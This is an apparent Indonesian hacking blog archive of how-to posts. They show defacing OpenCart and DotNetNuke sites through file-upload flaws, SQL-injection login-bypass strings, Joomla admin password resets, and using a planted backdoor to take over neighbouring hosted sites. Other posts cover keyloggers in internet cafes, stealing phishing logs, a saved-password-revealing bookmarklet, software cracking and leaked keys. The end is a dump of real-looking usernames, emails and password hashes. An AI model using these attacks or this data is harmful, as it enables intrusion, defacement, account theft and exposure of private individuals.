- Farmville - Tweaker- Farmville - Bot
- Farmville - Helper
- Farmville - Magic Tools 15
- Ninja Warz Bot
- Typing Robot 1.0
- Yoville Coin Smuggler v1.8.2
- Zynga Poker Bot v5.17.360
- Fiddler 2
- Charles 3.2
- Cheat Engine 5.6

Cheat Terdiri Dari :
- City of Wonder
- Coffe World
- FarmVille
- Frontier Ville
- PetSociety
- NightClub
- My City Life
- Ninja Saga
- Restaurant City
- Social City
- Treetopia
- Typing Maniac
- Yoville

NB : Kalo ada iklanya.. di SKIP AD aja.. ( disudut kanan atas )

Klik Disini untuk lebih Jelasnya .
Download Disini
password : http://vriga.multiply.com
Thxk for vriga

Remote File Upload Opencart (deface)

2011-02-04T17:38:00.001+07:00

lngsung aja...

dork : Powered By OpenCart site:com

"site:" terserah, yang penting support opencart

ex target: http://www.harleypartsintl.com/
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya
ex: http://www.target.com/patch/

nah kalo dh dpt trget, lngsung aj kita inject exploitnya

for exploit :
Quote:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

jdi nya gni
ex: http://www.harleypartsintl.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

kalo target yang ad /patch/ , inject nya d belakang patch nya
ex:www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
jika berhasil mka akan kluar alert sprti ini
Code:
"file uploaded with no errors"

liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"

skrng liat hasilnya....

ex hasil: http://www.harleypartsintl.com/hacked2.htm

sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..

sumber : http://hacker-newbie.org/showthread.php?tid=6783

Tips Googling (Teknik Mendapatkan Hasil Lebih sempurna)

2011-01-31T11:32:00.001+07:00

Biasanya ya kalo googling tuh suka banyak hasil yang memuaskan. suka di ajak kemana mana ngaler ngidul.. ni saya kasi tips nya.

Intitle
Digunakan untuk mencari informasi pada judul atau title sebuah halaman web
Contoh : anda mengetik “ intitle:blogspot” {tanpa tanda kutip} maka hasil yang di
tampilkan adalah halaman yang menggunakan title blogspot

Inurl
Digunakan untuk menghasilkan hasil pencarian yang mengandung kata kunci pada
URL yang kita cari
Contoh : anda mengetik “ inurl:blogspot” {tanpa tanda kutip} maka hasil yang akan di
tampilkan adalah URL/ Halaman web yang menggandung kata blogspot

Site
Digunakan untuk mencari kata kunci yang anda cari pada satu alamt situs saja dan
dapat digunakan untuk mencari jumlah situs pada suatu negara
Contoh: anda mengetik “ blogspot site:microsoft.com “ {tanpa tanda kutip } maka
hasil yang akan di tampilkan adalah hanaya yang berkaitan tentang blogspot dan
juuga hanya pada alamat microsoft.com
Untuk mengetahui jumlah situs pada sebuah negara
Contoh : anda mengetik “ site:id “ { tanpa tanda kutip } maka google akan melaporkan
jumlah situs yang ada di indonesia . Id merupakan ekstensi dari situs yang ada di
indonesia

Filetype
Digunakan untuk mencari sebuah fle di internet dengan ekstensu tertentu misalnya:
.mp3, .doc, .xls, .mdb, .txt, .pdf .dan lain-lain
Contoh: anda mengetik “ peterpan filetype:mp3 “ {tanpa tanda kutip } maka hasil yag
akan di tampilkan file mp3 dari band peterpan yang bisa anda langsung download

Intext
Digunakan untuk menampilkan hasil pencarian yang berupa kata-kata pada body aitus
tertentu.
Contoh: anda mengetik “ intext:admin “ {tanpa tanda kutip } maka hasilnya ialah
halaman yang mengandung kata kunci admin.

Info
Digunakan untuk mencari informasi dari sebuah situs yang di cari
Contoh: “ info:kompas.com “ { tanpa tanda kutip } maka hasil yang akan di tampilkan
adalah informasi dari kompas.com
Nah itu semua sebagan dasar google hacking semua sintak tersebut dapat di gabung
kan untuk mendapat kan hasil yang memuaskan sehingga gak lama mencari apa yang
akan kiita cari
Semua sintak dasar diatas merupakan dasar dari Google Hacking, untuk
menghasilkan hasil pencarian yang kamu inginkan, anda tinggal menggambungkan
sintak 1 dengan sintak lainnya.
Contoh : “filetype:mp3 site:shared.com” { tanpa tanda kutip } ini merupkan gabungan
2 sintak, antara sintak filetype dan site .sintak diatas digunakan jika anda ingin
mendownload mp3 dari 4shared.com

Hack Website.asp Strings Code SQL

2011-01-31T11:22:00.001+07:00

Langsung aja 1) Buka Uncle Google.com
2) Cari dork ---> site:go.id login.asp <--- Cth target www.target.com/login.asp
3) Username = Admin
Password = 'or"='
OR
Username = 'or"='
Password = 'or"='
4) Jika berasil seludup masuk sebagai admin, buka satu persatu link file disana.
5) Cari file yg boleh kita ubah/deface
6) Kalau tidak berasil cari target lain

Notes (Strings Password SQL) :-
---> 1'or'1'='1
---> 'or"='
---> 0'or'0'='0
---> admin'--
---> ' or 0=0 --
---> " or 0=0 --
---> or 0=0 --
---> ' or 0=0 #
burung irian brg cendrawasih.
cukup sekian dah terima kasih. wkawkak BASI

Dot Net Nuke (hacked gampang dan simple)

2011-01-31T09:34:00.000+07:00

=================
| Hacked --> Dot Net Nuke |
=================
Trik ini boleh dikatakan trik purba kala dahulu, tapi untuk permulaan kita harus perlajari/mengetahui nye ea x??~_^

1) Siapkan file deface kamu Cth --> http://www.anphucinvestment.vn/Portals/0/awaw.txt
2) Cari dork di Uncle Google.com --> inurl:”/portals/0?
3) Cth target --> http://www.target.com/Portals/0/...
4) Potong setengah link target seperti ini --> http://www.target.com/
5) Tambahkan ini di URL--> /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Cth --> http://www.target.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
6) Tandakan pada >> File ( A File On Your Site )
7) Kemudian hapuskan link URL --> http://www.target.com/Providers/..gallery.aspx
8) Masukkan JavaScript ini pada link yg dipadam tdi --> javascript:__doPostBack('ctlURL$cmdUpload','') ENTER!
9) Lalu upload file yg dibuat tadi rujuk pada langkah > 1)

Target awaw.txt --> http://www.anphucinvestment.vn/Portals/0/awaw.txt
sekian dulu. sumber dari berbagai sumber. indonesianhackerteam, newbie-hacker, group fb.
lupa.

Reset Password Joomla

2011-01-31T09:21:00.000+07:00

=========================
| Vuln Joomla, Mereset Password Admin |
=========================
Jika admin belum lagi patch Vuln ini,, kamu sangat bertuah^_^

1) Find Error Site (pakcik Google.com) --> inurl:jos_users" inurl:"index.php

2) Forget A Password --> /index.php?option=com_user&view=reset

3) Its Find E-Mail --> (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)

4) Its Find Username --> (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)

5) Its Find Admin Profile --> (username,0x3a,password)

6) Its Find Token --> (0x3a,username,0x3a,email,0x3a,0x3a,activation)

7) Its Find Login/Outlogin --> index.php?option=com_user&view=login

* inurl:"option=com_juser"
* its find error sites, Some Site :-

--> (0x3a,username,0x3a,email,0x3a,0x3a,activation)
--> (0x3a,username,0x3a,email,0x3a,activation)

Notes :-
Copy Paste --> /index... @pun Tukar --> Cth yg ditukar (0x3a,username,0x3a,email,0x3a,activation) Sahaja Pada Address Bar URL Sitenye.

Mengetahui Email Facebook yang tersembunyi

2011-01-30T17:46:00.002+07:00

Sebagian orang banyak yang menyembunyikan emailnya dari publik di info profil facebook, tujuannya untuk privacy atau alasan keamanan dari peretasan. Salah satu contohnya facebook saya seperti gambar disamping. Di informasi Kontak tersebut biasanya tercantum alamat email, namun karena saya privacykan jadi gak muncul kecuali kita sendiri yang melihatnya. Nah mungkin ada yang ingin tau alamat email dari facebook orang tertentu gak tau alasan dan tujuannya untuk apa. Yang jelas saya hanya membantu sekedar untuk mengetahuinya emailnya saja.

Langsung aja, berikut caranya:
1. Buka profil Target, misal facebook saya aja ya.

http://www.facebook.com/adminfaceboook
atau
http://www.facebook.com/profile.php?id=100000861xxx juga bisa

2. Buka link berikut : http://www.facebook.com/recover.php (Log Out dulu facebook kalian yang lagi login atau buka pakai browser lain).

3. Muncul 3 pilihan, kita pilih "Enter Your Facebook Username" dan masukkan username atau id prodil facebook target trus klik "search"

4. Akan muncul top up "Security Check", masukkan aja kode yang muncul.

5. Setelah sukses melewati security check, akan muncul tampilan reset password seperti gambar berikut.

6. Ketika yang muncul seperti gambar diatas (no.5), maka tinggal lihat source codenya dengan cara:

1. Klik kanan(pada tampilan reset), klik "view page sorce"
atau
2. Tekan tombol "CTRL+U"

Muncullah source kodenya seperti berikut, yang didalam kode tersebut terdapat email target.

7. Seperti gambar diatas, muncul emailnya seperti ini:

{"email":["ujie_caprone\uoo40ymail.com"]}

Tinggal gantikan aja ujie_caprone\uoo40ymail.com jadi ujie_caprone@ymail.com

Dah selesai pencarian email yang tersembunyi..

Semoga Berhasil dan Pergunakan Ilmu Sebaiknya untuk membantu bukan untuk merusak.

sumber http://ujie-caprone.blogspot.com

Teknik Crack Software Trial

2011-01-30T13:21:00.000+07:00

Teknik meng-Crack software-software aplikasi demo (Unregistered)/ trial. Mungkin anda pernah menggunakan software aplikasi yang belum teregistrasi/bersifat demo, mungkin anda jengkel jika waktu aplikasinya sudah habis. Perlu saya tambahkan untuk menjadi cracker perlu adanya tools untuk membantu menjalankan aksi kita. Berikut ini bagaimana caranya untuk menginstall software tersebut.

1. Download Program Micro Best Cracklock di sini

2. Setelah program Micro Best Cracklock di komputer anda jalankan dengan men-double click file setup.exe

3. Muncul pertanyaan:"This will install Cracklock. Do you wish to continue?" klik tombol Yes

4. Pada jendela Welcome, klik tombol Next

5. Pada jendela Information, klik tombol Next

6. Jika anda tidak ingin menganti folder default, maka pada jendela Select Destination directory, klik tombol Next untuk melanjutkan.

7. Sampai tahap ini, jika anda sudah yakin untuk menginstal Micro best Cracklock, segera klik tombol install. setelah itu tungulah beberapa saat sampai proses instalasi benar-benar selesai.

8.Proses instalasi telah selesai, klik tombol Finish untuk menutup jendela tersebut.

Aplikasi pada software Unregistered

1. Bukalah/ jalankan program Micro Best Cracklock v1.1

2. Dari jendela program klik ganda ikon Add Program. Tujuan anda mengklik ikon Add Program, adalah untuk menentukan nama file program aplikasi yang akan di crack oleh Micro Best Cracklock, dalam hal ini tetentukanlah terlebih dahulu lokasi atau direktori program aplikasi anda, baru setelah itu lanjutkan dengan memilih nama file executable.

3. Setelah anda selesai memilih file executable yang akan di crack oleh Micro Best Cracklock v1.1, anda akan dibawa masuk ke jendela configuration. Dalam hal ini anada akan menentukan waktu yang tepat untuk mengatur masa berlakunya agar program aplikasi yang sudah jatuh temponya tadi, bisa anda jalankan untuk selamanya.

4. Jika anda sudah selesai mengatur waktu masa berlakunya program tesebut, tutup jendela Configuration dengan cara mengklik tombol Apply - OK. Kemudian untuk menjalankan klik menu Program - Run.

Aplikasi Bom Jempol ni buat Facebook

2011-01-28T21:26:00.004+07:00

Nih gan ane ga sengaja waktu muter muter facebook sampe pusing. hehe
dapet kaya gini. wah mantap nih bisa nge bom jempol. tinggal klik doang deh jadi :D

langsung aja gan nih http://www.facebook.com/apps/application.php?id=112950175438610
applikasi http://apps.facebook.com/boomlagidan/

jangan lupa follow
~~kalau mau copas sertakan sumber~~ :)

Smadav Pro 8.4, key registrasi full anti bajakan

2011-01-27T17:05:00.002+07:00

Langsung aja dah.
kalo belum punya smadav 8.4 nya disini
Nih saya kasih Key Registrasi Smadav Pro
wakwkakwka
ss

Nama : aldyfrz
Key : 991999082250

Nama : aldyfreaks
Key : 998899601050

Nama : aldyfrz.blogspot.com
Key : 991999208060

THANKS TO SADEWA @HN Community

JANGAN LUPA FOLLOW YA

Situs MD5 Decrypter.

2011-01-27T16:48:00.002+07:00

kalo yang belum tau. ini buat semacam convert dari angka hash ke text buat dapetin password misalnya.
SITUS MD5 DECRYPING

- http://www.hash-cracker.com (40,000,000)

- http://www.cmd5.com/english.aspx (457,354,352,282)

- http://www.md5crack.com

- http://www.hashchecker.com

- http://md5cracker.tk/ (MD5 Search engine by searches a total of 14 on-line crackers.)

- http://www.md5decrypter.com (5,889,729)

- http://md5.rednoize.com (56,502,235)

- http://www.tmto.org/?category=main&page=search_md5 (306.000.000.000)

- http://www.milw0rm.com/cracker/insert.php (Milw0rm Cracker db)

- http://blacklight.gotdns.org/cracker/crack.php (2,456,288)

- http://www.shell-storm.org/md5 ( The data base currently contains 169582 passwords )

- http://md5.xpzone.de (Need Account)

- http://passcracking.com/ (Register to increase your priority)

- http://www.xmd5.org

-----------------------------------------------------------------
DAFTAR CRACKED PASSWORD
-----------------------------------------------------------------
http://www.md5oogle.com/md5hashes.php
http://www.hashchecker.com/?_sls=hash_list&_from=1
http://www.milw0rm.com/cracker/list.php
http://darkc0de.com/database/cracked.txt

-----------------------------------------------------------------
TABLE RAINBOW
-----------------------------------------------------------------
http://www.freerainbowtables.com/en/download/
http://www.rainbowtables.net/

Scan web yg satu hostingan

2011-01-24T18:06:00.001+07:00

OK…lets Start.

Misalkan ente punya Backdoor disalah satu web korban. Pasti ente penasaran dunk pengen melihat web2 apa saja yang satu hostingan dengan web korban. Dan nanti’y jg web hasil jumping tersebut bisa ente kuasai lagi.

Download file Scan Database terlebih dahulu :
http://www.ziddu.com/download/10782908/scandatabase.zip.html

Silahkan upload ke Backdoor ente, misalkan Backdoor ente beralamat di :
http://target.com/b374k.php <--- ini backdoor entehttp://target.com/ scandatabase.PHP <--- ini yg udah di pasang file scandatabaseTerus jalankan URL tersebut. Screenshot :

Klo sudah selesai, kira2 begini preview’y :

Tuwh diatas udah dapet korban2 yang satu hostingan.

Terus bagaimana cara mendapatkan web2 hasil jump tersebut ?

Kita coba satu target hasil jump tadi. Misal : /home/hasiljump/public_html/
Copy pastekan ke directory yg dah ane kasih tanda tuwh diatas. Klo udah KLIK GO

OK..klo udah, Sekarang qta dagh berada di database web yg berbeda. Web hasil jumping.
Selanjut’y cari nama file yg menyimpan username and password mysql web tersebut. Biasa’y si web menyimpan dengan nama :

Config.php
wp-config.php
configuration.php dan masih banyak lagi.

Klo udah dapet file yg bernama, misalkan : configuration.php, wp-config.php atau Config.php. Silahkan bedah nama file tersebut. Nanti’y kalian akan mendapatkan username and password mysql.
Klo udah dapet username and password silahkan login ke mysql web tersebut. Klik Mysql. Preview :

Klo udah masuk ke database Mysql. Silahkan Login.
Selanjut’y Cari nama file --> users trs KLIK.

Klo udah, Klik Icon pencil and kertas atau Edit. Ganti password admin dengan ini : 21232f297a57a5a743894a0e4a801fc3

Nanti’y qta login seperti ini :
Username : admin
Password : admin
Ok..klo semua’y udah di praktek’in dengan benar, Silahkan cari halaman login admin.
Misalkan : http://www.hasiljump/login/admin
Username : admin
Password : admin
Ok selesai, Klo dagh masuk ke halaman admin. Tgl upload Backdoor lagi degh.

sumber : http://forum.devilzc0de.org/thread-2473.html

Buat Page Deface Online

2011-01-24T16:36:00.001+07:00

Yang lagi males bikin page buat deface, bisa pake tools online ini mas bro. fitur'y dah lumayan lah, monggo cekidot : http://defacemaker.info/maker.html

1. Banner image [ Mas bro, bisa nyari banner di google, ato pake banner sendiri yg dagh di upload di tempat hosting images, cara'y tgl copas ae URL'y ]

2. Title [ Tulis disitu nama ente, misal --> Patriot Cute ]
3. Hacked by [ yg ini sama seperti diatas, mas bro juga bisa ninggalin pesan wat situs ntuh..!!]
4. Music [ yg ini mas bro bisa ngambil dr youtube, misalkan: http://www.youtube.com/watch?v=FwlKSKdsLG4, nanti mas bro ambil ekor'y aja.
ambil ini'y ae --> FwlKSKdsLG4
5. Background [ seperti no.1, tgl copas ae URL image'y. kalo bisa gambar yg berukuran besar yah. full page misal ukran 102..X7...]

Next Klik "Get Code"

Sekian Tutorial Cupu dr ane

Kisah tukang pasang keylogger

2011-01-24T15:57:00.000+07:00

Ini kisah temen ane di forum ngumpulin password klo lagi di warnet.. ;)...

Siapakan perlengkapan !
1. Teamviewer
2. Keylogger [ klo ane make pnya si cat (YF) ]
3. Undeepfreeze
4. Uang gocap [ biar puass... masang keylog skalian cari kucing ( BPK ) ]

Hari pertama...
Si budi pergi ke warnet bersama2 dengan teman2 main di PC no. 10 budi main dan dengan niatan jahat di sertai baca al-fatiha + wirid dia memasang
1. Undeep dlu trus restart :) biar permanen super panjang
2. Pasang keylogger klo perlu RDP biar nancepp...
3. Udh dah... suruh temen aja main di komputer itu cckckckc....

Pulang dengan rasa bangga... sampe di rumah nyalain kompi back connect :) nikmatin perasaaan tak tertahankan...

thanks,

mama, papa, kaka, adik... kakek.. nenek... all

wakkawkakwakwkawk JANGAN DITIRU KK !!

Hasil Fake login orang.

2011-01-24T15:50:00.000+07:00

sesuai dengan judul ane newbie mau kasih tips sedikit walaupun agak curang dikit gpplah namanya juga jalur haram,mengambil yang bukan milik kita sendiri.. tapi lebih parahnya maling kok di malingin...wkakwakwkaw.
saya mah engga ya. cuma buat belajar doang :P :P.
langsung ajja om.

saat ini facebook kan banyak yang masang phisingan/fake login untuk mencari keuntungan/mengambil data atau yg barharga dari facebook.contohnya chips poker...bisa juga ke arah yg lebih parah seperti penipuan lainnya...
di blog,website,forum banyak yg memberikan artikel membuat phising/fake login dan hampir smua artikel menyertai file phisingnya, namun kebanyakan hasil phising/fake login akan di kirimkan ke halaman logs.txt (kalau ane sendiri kirimnya ke email ane sendiri jadi lebih aman gak bisa di liat orang tapi dulu sekarang udah gak main lagi...hihihihi udah tobat)ya udah kalo kebanyakan basa basi nanti jadi panjang..langsung aja dah..

Tujuan : Mengambil hasil phising/fake login orang lain jadi gak capek2 nyebar2 link atau ngejebak orang (maling di malingin )
caranya : buka google terus masukin keyword intext:"password" inurl:"logs.txt"
terus teken enter...eng ing eng.. banyak tuh dah hasil phisingan orang, dia yg capek tinggal kita yang petikin...wahahahahah

kalo yg pada tau sih. pada langsung rename logs.txt nya nih.....
sekian sedikit tips dari newbie mohon maaf kalo gak bermutu maklumin yah namanya juga ..::masih newbie terus::..

Ngintip Saved Password di browser

2011-01-24T15:14:00.001+07:00

okeh, langsung aja ya..
ni biasanya sering terjadi kalo kita berada di warnet, sering banget kita lihat beberapa website kayak facebook, mail.yahoo, dll masih menyimpan password mereka dalam bentuk bintang [ * ]. untuk yang penasaran ingin tau karakter apa sih yang bersembunyi dibalik karekter bintang itu??
caranya copy paste coe berikut di addressbar lalu enter.

code:
javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == %22password%22) s += f[i].value + %22\n%22; } } if (s) alert(%22tridizone.info mengoprek karakter * ini menjadi:\n\n%22 + s); else alert(%22There are no saved passwords in forms on this page.%22);})();

Disable Deep Frezee tanpa restart

2011-01-19T21:36:00.003+07:00

xixixixi coba post dalam bidang hacking sekalian belajar tehniknya,tapi bukan berati aku ingin menjadi hacker. :D
mank menyebalkan sekali nich si beruang putih di setiap warnet.dia akan mengembalikan semuanya ke settingan awal pertama pas di install si beruang putih,gimna kalo kita hajar yuk.??resiko ditanggung penumpang loh :))
ok langsung az langkah2nya :

1. klik command run
2. kemudian ketik di textboxnya msconfig
3. nah pada tab SERVICE buang centang pada service DF5Serv
4. kemudian apply. terus di close. ingat jgn di restart.keluar tanpa restart
5. buka task manager klik tab process,cari FrzState2k dan DF5Serv kemudian kill process.
6. close task manager dan icon kecil deepfreze sebelah kiri pun ilang.

untuk pengaktifannya kembali centang lagi di msconfig bagian service pada service DF5Serv

semoga bermanfaat

Kumpulan shell

2011-01-19T17:24:00.001+07:00

nih kumpulan shell. lupa lagi dapet dari mana. ga tau googling ga tau dari
indonesianhacker.or.id ga tau dari hacker-newbie.org
pokonya makasi lah yg udah share shell nya.
http://www.ziddu.com/download/13460169/kumpulanshell.rar.html

Tools Facebook mantapp

2011-01-19T17:14:00.002+07:00

nih saya share aja. kebetulan nemu d mana lupa lagi saya :D. coba aja mas bro.

1) Facebook_Friend_Bomber_2.0.1
http://rapidshare.com/files/172206243/Facebook_Friend_Bomber_2.0.1.rar(7mb)

Fungsi:
1. Mass Facebook Amber Alerts
2. Mass Facebook Friend Requests
3. Mass Facebook Friend Messages
4. Mass Facebook Friend Pokes
5. Mass Facebook Wall Poster
6. Save & Gather ID User

Dalam 1 hari bisa sampai 100-500-100-(unlimited) Friend Request..
truz Nanti Bakal Di Blok Dah Tu Account..

2) Coba juga yg ini..

Facebook Blaster Pro V3.5.7 + keygen 3.x.x
DOWNLOAD:
http://uploading.com/files/0EB38TC3/facebook_blaster_pro_keygen_3.x.x.allfan.info.zip.html

http://hotfile.com/dl/9293043/e7e67cd/facebook_blaster_pro_keygen_3.x.x.allfan.info.zip.html

3) Facebook Account Hacker v2.4

Hack Facebook Account

Masukkan Target E-Mail Address
Jenis Dalam A Jumlah Password Untuk Menghasilkan Untuk secara acak Cobalah Untuk Hack The Facebook Account
Menggunakan The Facebook API Untuk Cepat Masukkan Passwords Dan Bypass CAPTCHA

DOWNLOAD:
http://hotfile.com/dl/9445862/91cca74/Facebook_Account_Hacker_v2.4.rar.html

Hack Facebook. (untung-untungan)

2011-01-19T16:51:00.000+07:00

Pengen Ngehack Account Paypal, atau nyari Chip Poker di Facebook ?
Jika menggunakan Keylogger, mungkin ngga bertahan lama, karena lama kelamaan si penjaga warnet akan tau, Pengen pake Fake Login juga jarang yang kena, karena mereka sudah bookmark halaman facebook.

Mungkin bisa gunain cara Seperti Berikut ini :
1. Siapin Kopi, Sambil Ngerokok
2. Buka website untuk mengenkripsi MD5, misalkan http://www.md5encryption.com
3. Masukkan password yang kira kira dipakai oleh pengguna facebook, misalkan Bismillah, Indonesia, Jakarta, Semarang, dll
4. Saya ambil contoh mencari account yang menggunakan password Bismillah. Saya akan encrypt password Bismillah menjadi MD5 sehingga hasilnya a8e52217c48d055fb98e2732c587d056
5. Gunakan Google sebagai pencari dengan kata kunci a8e52217c48d055fb98e2732c587d056

Hasilnya........ Wew, Keren ..............

=======================================
:{s:2:"ID";s:2:"15";s:10:"user_login";s:11:"suci2006tri";s:9:"user_pass";s:32:"cbadce38e78bbb5f69e70e8d30d6421c";s:10:"user_email";s:21:"suci2006tri@yahoo.com";s:8:"user_url";s:7:"http://";}i:13;a:5:{s:2:"ID";s:2:"16";s:10:"user_login";s:11:"ejaalfabeta";s:9:"user_pass";s:32:"5099cad5505d32f53d351292772f23a5";s:10:"user_email";s:21:"asah_pena@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:14;a:5:{s:2:"ID";s:2:"17";s:10:"user_login";s:9:"shadyhuda";s:9:"user_pass";s:32:"662906a82298148e463c55c03e9dd15e";s:10:"user_email";s:20:"penasyahid@gmail.com";s:8:"user_url";s:36:"http://www.baityjannati.blogspot.com";}i:15;a:5:{s:2:"ID";s:2:"18";s:10:"user_login";s:5:"WaOne";s:9:"user_pass";s:32:"c3653e4408832e6611f37dcd90544de8";s:10:"user_email";s:18:"WaOne_09@yahoo.com";s:8:"user_url";s:8:"http://-";}i:16;a:5:{s:2:"ID";s:2:"20";s:10:"user_login";s:15:"gadislilinkecil";s:9:"user_pass";s:32:"9abd53722e8e33d2c93e5d84d0545dea";s:10:"user_email";s:25:"iniemaibaruku@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:17;a:5:{s:2:"ID";s:2:"22";s:10:"user_login";s:5:"Marry";s:9:"user_pass";s:32:"0c5d7c458d8aa95f78ee1cd6af30942a";s:10:"user_email";s:14:"marry@rock.com";s:8:"user_url";s:7:"http://";}i:18;a:5:{s:2:"ID";s:2:"23";s:10:"user_login";s:11:"herupranoto";s:9:"user_pass";s:32:"e16fef44c04d17721f422a64a250dad5";s:10:"user_email";s:20:"hr_pranoto@yahoo.com";s:8:"user_url";s:7:"http://";}i:19;a:5:{s:2:"ID";s:2:"24";s:10:"user_login";s:4:"ovan";s:9:"user_pass";s:32:"d32ce9e4864e399d9f244e41d55d3a18";s:10:"user_email";s:20:"navokifaut@yahoo.com";s:8:"user_url";s:7:"http://";}i:20;a:5:{s:2:"ID";s:2:"25";s:10:"user_login";s:11:"ali_elbahri";s:9:"user_pass";s:32:"5fed2778a8b692bcdeadfe6796acb4b9";s:10:"user_email";s:23:"ali_elbahri@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:21;a:5:{s:2:"ID";s:2:"26";s:10:"user_login";s:17:"Hendra Sugiantoro";s:9:"user_pass";s:32:"ca9460e4040395fb17f8cfa00edc3053";s:10:"user_email";s:26:"hendra_merdeka@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:22;a:5:{s:2:"ID";s:2:"27";s:10:"user_login";s:9:"Mr. Didin";s:9:"user_pass";s:32:"9df9df486a33e4a9b77b6ec7b2dff6bb";s:10:"user_email";s:19:"xxdidinxx@yahoo.com";s:8:"user_url";s:27:"http://sardind.multiply.com";}i:23;a:5:{s:2:"ID";s:2:"29";s:10:"user_login";s:10:"ngatifudin";s:9:"user_pass";s:32:"f321e904144468127e2c365d2e8d1ee3";s:10:"user_email";s:22:"ngatif_rufie@yahoo.com";s:8:"user_url";s:7:"http://";}i:24;a:5:{s:2:"ID";s:2:"30";s:10:"user_login";s:6:"DBaonk";s:9:"user_pass";s:32:"7eb2cf531a325741e2688a2043f3e3cf";s:10:"user_email";s:20:"dennybaonk@gmail.com";s:8:"user_url";s:26:"http://dbaonk.multiply.com";}i:25;a:5:{s:2:"ID";s:2:"31";s:10:"user_login";s:9:"Rahmatiah";s:9:"user_pass";s:32:"88e20d637c3849ec3bcc73cc7b03de1f";s:10:"user_email";s:23:"tia_bahalap@yahoo.co.uk";s:8:"user_url";s:7:"http://";}i:26;a:5:{s:2:"ID";s:2:"33";s:10:"user_login";s:13:"ersya syamira";s:9:"user_pass";s:32:"c060ecbf17fdef81cf4c25b26fdc97da";s:10:"user_email";s:25:"ersya_syamira@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:27;a:5:{s:2:"ID";s:2:"35";s:10:"user_login";s:7:"sumahan";s:9:"user_pass";s:32:"2c9221de2b47fb9e7cad3e8fc6ba52f7";s:10:"user_email";s:18:"suma.han@yahoo.com";s:8:"user_url";s:7:"http://";}i:28;a:5:{s:2:"ID";s:2:"36";s:10:"user_login";s:20:"chairan hafzan yurma";s:9:"user_pass";s:32:"88a18b4dfe0f9a61b74a0b3f93763d58";s:10:"user_email";s:19:"koeboe_84@yahoo.com";s:8:"user_url";s:7:"http://";}i:29;a:5:{s:2:"ID";s:2:"38";s:10:"user_login";s:2:"fi";s:9:"user_pass";s:32:"87638e03ac9b1d794e26f46994ea4099";s:10:"user_email";s:23:"fitrijuniarny@yahoo.com";s:8:"user_url";s:7:"http://";}i:30;a:5:{s:2:"ID";s:2:"39";s:10:"user_login";s:10:"GeNza_dHia";s:9:"user_pass";s:32:"74870fd97c81792e781cbe47f6cf7ad7";s:10:"user_email";s:22:"genza_dhia@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:31;a:5:{s:2:"ID";s:2:"40";s:10:"user_login";s:9:"ekarosita";s:9:"user_pass";s:32:"2e95185823298a28672b5323436a9774";s:10:"user_email";s:19:"arrum_1st@yahoo.com";s:8:"user_url";s:20:"http://www.yahoo.com";}i:32;a:5:{s:2:"ID";s:2:"43";s:10:"user_login";s:12:"Umi Maisaroh";s:9:"user_pass";s:32:"a6eefcabe2807fb19611e6bc0a90e5e5";s:10:"user_email";s:23:"ma15a_ghoni@yahoo.co.id";s:8:"user_url";s:10:"http://umm";}i:33;a:5:{s:2:"ID";s:2:"46";s:10:"user_login";s:14:"fahmi-amrulloh";s:9:"user_pass";s:32:"d40b7068939a0ad71787f202f1e7c2de";s:10:"user_email";s:29:"arekjombang_0321@yahoo.com.sg";s:8:"user_url";s:34:"http://fahmi-amrulloh.blogpsot.com";}i:34;a:5:{s:2:"ID";s:2:"48";s:10:"user_login";s:5:"Akmal";s:9:"user_pass";s:32:"de4e90e16210087149de588808b99cdc";s:10:"user_email";s:23:"malakmalakmal@yahoo.com";s:8:"user_url";s:25:"http://akmal.multiply.com";}i:35;a:5:{s:2:"ID";s:2:"50";s:10:"user_login";s:11:"azhar_sinai";s:9:"user_pass";s:32:"85e5a08008b15aad78b7d80b65228ab5";s:10:"user_email";s:21:"azhar_sinai@yahoo.com";s:8:"user_url";s:7:"http://";}i:36;a:5:{s:2:"ID";s:2:"51";s:10:"user_login";s:12:"mita_elrahma";s:9:"user_pass";s:32:"60d247db2492dc61af565c203eff43d9";s:10:"user_email";s:24:"mita_elrahma@yahoo.co.id";s:8:"user_url";s:8:"http://-";}i:37;a:5:{s:2:"ID";s:2:"54";s:10:"user_login";s:4:"omen";s:9:"user_pass";s:32:"7067168aab5272c167cf184a7cae281d";s:10:"user_email";s:20:"omenbrsx01@yahoo.com";s:8:"user_url";s:7:"http://";}i:38;a:5:{s:2:"ID";s:2:"55";s:10:"user_login";s:4:"dody";s:9:"user_pass";s:32:"011c76ea3b4d9441ab7e6591f55b0e47";s:10:"user_email";s:22:"dody_haris@yahoo.co.id";s:8:"user_url";s:7:"http://";}i:39;a:5:{s:2:"ID";s:2:"58";s:10:"user_login";s:13:"onengmaruneng";s:9:"user_pass";s:32:"0c9ffceaae409262cbf4d2ae7a1257f5";s:10:"user_email";s:22:"aryamandira@telkom.net";s:8:"user_url";s:7:"http://";}i:40;a:5:{s:2:"ID";s:2:"59";s:10:"user_login";s:6:"lukman";s:9:"user_pass";s:32:"2e84846da99cd198e21c9bc13ab97080";s:10:"user_email";s:21:"lukman_mine@yahoo.com";s:8:"user_url";s:7:"http://";}i:41;a:5:{s:2:"ID";s:2:"60";s:10:"user_login";s:11:"Dian 